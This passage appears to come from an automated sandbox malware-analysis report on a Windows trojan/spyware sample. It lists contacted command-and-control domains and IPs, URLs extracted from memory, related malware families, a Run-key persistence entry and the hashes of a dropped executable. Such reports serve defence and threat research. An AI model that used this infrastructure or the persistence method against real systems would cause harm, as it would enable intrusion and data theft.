https://www.modern.ie/Umbraco/Api/CompatIssueApi/PostCompatIssue?version=2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
balkancelikdovme.com	185.181.116.217	true	true	18%, Virustotal, Browse	unknown
greatzillart.ydns.eu	185.216.71.113	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.certplus.com/CRL/class3.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.e-me.lv/repository0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.acabogacia.org/doc0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.chambersign.org/chambersroot.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.suscerte.gob.ve0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.postsignum.cz/crl/psrootqca2.crl02	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://www.baidu.com/s?tn=80035161_2_dg&wd=	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.chambersign.org1	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://repository.swisssign.com/0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.suscerte.gob.ve/lcr0#	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.ssc.lt/root-c/cacrl.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://postsignum.ttc.cz/crl/psrootqca2.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false		high
http://test.com	0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.certplus.com/CRL/class3P.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.cn/spartan/ientp?locale%3D%25s%26market%3D%25s%26enableregulatorypsm%3D%25d%26enable	0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.suscerte.gob.ve/dpc0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.certeurope.fr/reference/root2.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.certplus.com/CRL/class2.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.disig.sk/ca/crl/ca_disig.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	0vJrK0NCd1.exe, 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.defence.gov.au/pki0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sk.ee/cps/0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.globaltrust.info0=	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.anf.es	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pki.registradores.org/normativa/index.htm0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://policy.camerfirma.com0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ssc.lt/cps03	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.pki.gva.es0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.anf.es/es/address-direccion.html	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.anf.es/address/)1(0&	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://ca.mtin.es/mtin/ocsp0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-b/cacrl.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.certicamara.com/dpc/0Z	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://./key/plist/dictdictarrayTitleBookmarksBarBookmarksMenuURIDictionary	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.pki.wellsfargo.com/wsprca.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.res://ieframe.dll/MonitoringEnableFeeds.htmres://ieframe.dll/WebPreviewLoading.htmres://i	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwww.certigna.fr/autorites/0m	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.dnie.es/dpc0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://ca.mtin.es/mtin/DPCyPoliticas0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.anf.es/AC/ANFServerCA.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.globaltrust.info0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://certificates.starfieldtech.com/repository/1604	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://acedicom.edicomgroup.com/doc0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.certplus.com/CRL/class3TS.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crl.anf.es/AC/ANFServerCA.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.certeurope.fr/reference/pc-root2.pdf0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ac.economia.gob.mx/last.crl0G	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.catcert.net/verarrel	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.disig.sk/ca0f	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.e-szigno.hu/RootCA.crl	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sk.ee/juur/crl/0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.chambersign.org/chambersignroot.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://certs.oati.net/repository/OATICA2.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.oces.trust2408.com/oces.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.quovadis.bm0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://eca.hinet.net/repository0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ssc.lt/root-a/cacrl.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://certs.oaticerts.com/repository/OATICA2.crl	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.trustdst.com/certificates/policy/ACES-index.html0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.yandex.com/favicon.icoYandex	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false		high
http://certs.oati.net/repository/OATICA2.crt0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.accv.es00	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.netlock.net/docs	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pmail.com	0vJrK0NCd1.exe, 00000000.00000003.422250057.0000000002F44000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422202761.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422437505.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422677307.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422159926.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422595078.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422700357.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.421759155.0000000002F47000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.e-trust.be/CPS/QNcerts	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.ncdc.gov.sa0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	false		high
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.datev.de/zertifikat-policy-int0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.modern.ie/Umbraco/Api/CompatIssueApi/PostCompatIssue?version=2	0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://repository.luxtrust.lu0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersroot.html0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.acabogacia.org0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.eca.hinet.net/OCSP/ocspG2sha20	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.firmaprofesional.com/cps0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.uce.gub.uy/acrn/acrn.crl0	0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.216.71.113	greatzillart.ydns.eu	Germany		43659	CLOUDCOMPUTINGDE	false
185.181.116.217	balkancelikdovme.com	United Kingdom		29017	GYRONGB	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1296068
Start date and time:	2023-08-23 19:29:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	0vJrK0NCd1.exe
Original Sample Name:	8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@42/20@5/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 13.9% (good quality ratio 10.1%) Quality average: 63.5% Quality standard deviation: 40.5%
HCA Information:	Successful, ratio: 86% Number of executed functions: 2 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, g.bing.com, displaycatalog.mp.microsoft.com, arc.msn.com
Execution Graph export aborted for target 0vJrK0NCd1.exe, PID 6460 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:30:29	API Interceptor	1x Sleep call for process: 0vJrK0NCd1.exe modified
19:30:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Elpuxpki C:\Users\Public\Elpuxpki.url
19:30:46	API Interceptor	37x Sleep call for process: powershell.exe modified
19:30:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Elpuxpki C:\Users\Public\Elpuxpki.url
19:31:12	API Interceptor	2x Sleep call for process: Elpuxpki.PIF modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDCOMPUTINGDE	1hbJEJJnig.exe	Get hash	malicious	AsyncRAT, zgRAT	Browse	194.169.175.43
	https://schuceo.com/viloorel/hgfijhA/?userid=AhmedS.AlShamsi@cpc.gov.ae	Get hash	malicious	Unknown	Browse	80.76.51.101
	https://schuceo.com/viloorel/hgfijhA/?userid=AhmedS.AlShamsi@cpc.gov.ae	Get hash	malicious	Unknown	Browse	80.76.51.44
	https://schuceo.com/viloorel/hgfijhA/?userid=AhmedS.AlShamsi@cpc.gov.ae	Get hash	malicious	Unknown	Browse	80.76.51.101
	August_Quotation.xlam.xlsx	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	80.76.51.248
	Order_Request.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	NUEVO_PEDIDO_-_GF0003.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	NUEVO_PEDIDO_-_CF0002.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	pee.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	185.216.71.134
	OC.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	New_Order.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	BOQ_MXN9900.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	Purchase_Order.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	file.exe	Get hash	malicious	Unknown	Browse	185.216.71.79
	file.exe	Get hash	malicious	Unknown	Browse	185.216.71.79
	NOVA_ORDEM_-_CF0002_WJO-001.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	NUEVO_PEDIDO_-_CF0002.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	80.76.51.248
	file.exe	Get hash	malicious	Clipboard Hijacker, PrivateLoader, RisePro Stealer	Browse	194.169.175.123
	pcIacW4ADx.elf	Get hash	malicious	Mirai	Browse	185.216.71.187
	WhcHIvZtui.elf	Get hash	malicious	Mirai	Browse	185.216.71.187

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	2023 PayNet - Critical Security Incident Official Notice.doc	Get hash	malicious	Unknown	Browse	185.181.116.217
	file.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	185.181.116.217
	Setup.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	185.181.116.217
	file.exe	Get hash	malicious	Clipboard Hijacker, PrivateLoader, RisePro Stealer	Browse	185.181.116.217
	yzFg2xM3mK.exe	Get hash	malicious	SmokeLoader	Browse	185.181.116.217
	file.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	185.181.116.217
	Past Due.xlsx	Get hash	malicious	Unknown	Browse	185.181.116.217
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse	185.181.116.217
	file.exe	Get hash	malicious	Clipboard Hijacker, PrivateLoader, RisePro Stealer	Browse	185.181.116.217
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	185.181.116.217
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	185.181.116.217
	DropboxInstaller.exe	Get hash	malicious	Unknown	Browse	185.181.116.217
	GfwhNvMfdW.exe	Get hash	malicious	Unknown	Browse	185.181.116.217
	GfwhNvMfdW.exe	Get hash	malicious	Unknown	Browse	185.181.116.217
	LDX8pPMxTc.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	185.181.116.217
	big_massive_gibbon.exe	Get hash	malicious	Unknown	Browse	185.181.116.217
	big_massive_gibbon.exe	Get hash	malicious	Unknown	Browse	185.181.116.217
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	185.181.116.217
	LOGISTEC.xlsx	Get hash	malicious	SharepointPhisher	Browse	185.181.116.217
	Notice_8639466.html	Get hash	malicious	Unknown	Browse	185.181.116.217

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	219079
Entropy (8bit):	7.319708870300419
Encrypted:	false
SSDEEP:	6144:Agzj/mCtnRPF9cCGr/uHkBV+UdvrEFp7hKgo:AgzjhnRNh4uHkBjvrEH7Fo
MD5:	6BE327A3243FA377A7373C8F1386FF70
SHA1:	96DF0550E3BA991E0EA253C8712E1B7AB352CCAD
SHA-256:	5B915FC5E46E431C3DAB4196CC4D129F54773C8C707B542DE7348F42C33F63B5
SHA-512:	E4B555F706D354EF9556B4C08CA40B16E5FB27CC5A5CFAF980C16C853D68DA387DF8C6785AF5C4AE10776030C1B00EC2DCC8F7E54A131E71B7EC239C37638F0C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.T6...6...6...}...<...}.......}..."...............'......."...}...1...6...T.......7.....:.7...6.R.7.......7...Rich6...........PE..L..../.d...............#.....d....................@..........................`............@..................................;..P....p.. ............................/..p............................/..@...............P............................text...3........................... ..`.rdata...c.......d..................@..@.data........P.......2..............@....rsrc... ....p.......<..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	219079
Entropy (8bit):	7.319708870300419
Encrypted:	false
SSDEEP:	6144:Agzj/mCtnRPF9cCGr/uHkBV+UdvrEFp7hKgo:AgzjhnRNh4uHkBjvrEH7Fo
MD5:	6BE327A3243FA377A7373C8F1386FF70
SHA1:	96DF0550E3BA991E0EA253C8712E1B7AB352CCAD
SHA-256:	5B915FC5E46E431C3DAB4196CC4D129F54773C8C707B542DE7348F42C33F63B5
SHA-512:	E4B555F706D354EF9556B4C08CA40B16E5FB27CC5A5CFAF980C16C853D68DA387DF8C6785AF5C4AE10776030C1B00EC2DCC8F7E54A131E71B7EC239C37638F0C
Malicious:	true
